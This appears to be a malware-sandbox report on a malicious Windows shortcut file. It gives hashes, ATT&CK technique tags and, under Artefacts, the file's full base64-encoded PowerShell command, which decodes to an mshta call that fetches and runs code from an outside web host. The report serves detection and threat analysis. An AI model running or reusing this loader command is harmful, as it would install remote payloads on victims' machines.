Malicious
Malicious

d417f07b8eac10d7e14bacae56002256

LNK File
|
MD5: d417f07b8eac10d7e14bacae56002256
|
Size: 1.34 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d417f07b8eac10d7e14bacae56002256
Sha1
244452034b44ea99af6dc2217546987898f7a3f4
Sha256
2feda833dd94e3ff4a1c549814deb6552e162f36023a7aa400104ed528a1e190
Sha384
9a8588ff1dfd33603ab4ab6f966480670e688b010c09597d99d22c74fcc10a28c83b742404aa344521470ddfa2d4dbca
Sha512
e2b2d061dbb56b4ff8f3ef5f117c600e1464f798a48b195a4aef89db2267ca32b68624bb7fca2ef4f0582836cce755bdbe1b01a7c90c621db74e1cb25704ddd0
SSDeep
24:8hp/BHYVKVWf+/CWfO0lZseWrN8RqDcCB4PYP+uBarab7Z:8X5a4Tw3JDDc4gFA4aZ
TLSH
542138140EE20250E1B787757BFDB722C876BC95D95A9BE9014085405B34250F8F5F3F
File Structure
d417f07b8eac10d7e14bacae56002256
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="
d417f07b8eac10d7e14bacae56002256 (1.34 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙